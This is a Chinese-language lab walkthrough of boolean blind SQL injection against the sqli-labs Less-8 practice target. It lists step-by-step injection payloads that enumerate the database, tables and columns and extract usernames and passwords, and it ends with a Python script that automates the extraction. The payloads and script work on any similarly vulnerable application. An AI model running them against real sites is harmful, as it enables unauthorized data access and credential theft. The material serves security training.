一:确定注入类型
按照我们之前的步骤来
输入
?id=1' and '1'='1'--+
?id=1' and '1'='2'--+界面正常
第二行界面异常空白
所以注入类型为单引号闭合型
二: 布尔盲注
1.判断是否使用条件
(1):存在注入但不会直接显示查询结果
(2):页面不会返回sql错误信息
(3):注入真假时,页面会产生可观察到的差异
比如这一关我们输入
?id=1' and 1=1 --+ (返回"You are in...")
?id=1' and 1=2 --+ (页面空白)所以我们使用布尔盲注
二:开始攻击
1.爆库名长度
?id=1' and length(database())=1 --+ (无回显)
?id=1' and length(database())=2 --+
...
?id=1' and length(database())=8 --+ (出现"You are in...")ps:可以使用二分法提高效率
?id=1' and length(database())>4 --+ (有回显)
?id=1' and length(database())>6 --+ (有回显)
?id=1' and length(database())>8 --+ (无回显)2.根据库名长度爆库名:
-- 第一位字符
?id=1' and substr(database(),1,1)='a' --+
...
?id=1' and substr(database(),1,1)='s' --+ (成功)-- 第二位字符
?id=1' and substr(database(),2,1)='a' --+
...
?id=1' and substr(database(),2,1)='e' --+ (成功)-- 使用ASCII码提高效率
?id=1' and ascii(substr(database(),1,1))>115 --+
?id=1' and ascii(substr(database(),1,1))=115 --+ (s的ASCII码)3.对当前库爆表的数量
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 --+
...
?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+ (成功)4.根据库名和表数量爆表名长度
-- 第一个表长度
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1 --+
...
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+ (成功)-- 第二个表长度
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=8 --+ (成功)5. 根据表名长度爆表名
-- 第一个表名(emails)
?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' --+
?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='m' --+
...-- 第二个表名(users)
?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='u' --+6. 对表爆列数量(以users表为例)
?id=1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema=database())=3 --+ (成功)7. 根据表名和列数量爆列名长度
-- 第一列长度
?id=1' and length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1))=2 --+ (id)-- 第二列长度
?id=1' and length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1))=8 --+ (username)-- 第三列长度
?id=1' and length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1))=8 --+ (password)8. 根据列名长度爆列名
-- 第一列名(id)
?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i' --+
?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)='d' --+-- 第二列名(username)
?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)='u' --+9. 根据列名爆数据值
-- 获取第一个用户的用户名长度
?id=1' and length((select username from users limit 0,1))=4 --+ (Dumb)-- 获取第一个用户的用户名
?id=1' and substr((select username from users limit 0,1),1,1)='D' --+
?id=1' and substr((select username from users limit 0,1),2,1)='u' --+-- 获取第一个用户的密码
?id=1' and substr((select password from users limit 0,1),1,1)='D' --+-- 获取管理员密码
?id=1' and substr((select password from users where username='admin' limit 0,1),1,1)='a' --+三:脚本优化
1.先在终端输入python --version,会显示python版本,建议3.6+
2.安装resquests库
pip install requests
3.创建脚本文件
4
4.附上代码
import requests
import timedef get_database_info():# 配置目标URL和请求头base_url = "http://127.0.0.1/sqli-labs/Less-8/"headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ''(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'}# 1. 获取数据库名长度(使用二分法优化)print("[*] 正在检测数据库名长度...")db_length = 0low, high = 1, 50 # 假设数据库名长度在1-50之间while low <= high:mid = (low + high) // 2payload = f"1' AND (SELECT LENGTH(database())) > {mid} -- "response = requests.get(base_url, params={"id": payload}, headers=headers)if "You are in" in response.text:low = mid + 1else:high = mid - 1db_length = lowprint(f"[+] 数据库名长度: {db_length}")# 2. 获取数据库名(优化后的逐字符检测)print("[*] 正在破解数据库名...")database_name = ""for position in range(1, db_length + 1):# 使用二分法查找每个字符low, high = 32, 126 # ASCII可打印字符范围while low <= high:mid = (low + high) // 2payload = f"1' AND ASCII(SUBSTRING((SELECT database()), {position}, 1)) > {mid} -- "response = requests.get(base_url, params={"id": payload}, headers=headers)if "You are in" in response.text:low = mid + 1else:high = mid - 1if low <= 126:char = chr(low)database_name += charprint(f"[*] 进度: {database_name.ljust(db_length, '_')}", end="\r")time.sleep(0.1) # 避免请求过快else:print(f"\n[!] 第{position}个字符检测失败")breakprint(f"\n[+] 数据库名: {database_name}")return database_nameif __name__ == "__main__":try:print("=== SQL盲注自动化工具 ===")db_name = get_database_info()print("\n=== 操作完成 ===")except Exception as e:print(f"[!] 发生错误: {str(e)}")input("按任意键退出...")
)
)
)
![[Harmony]封装一个可视化的数据持久化工具](http://pic.xiahunao.cn/[Harmony]封装一个可视化的数据持久化工具)
)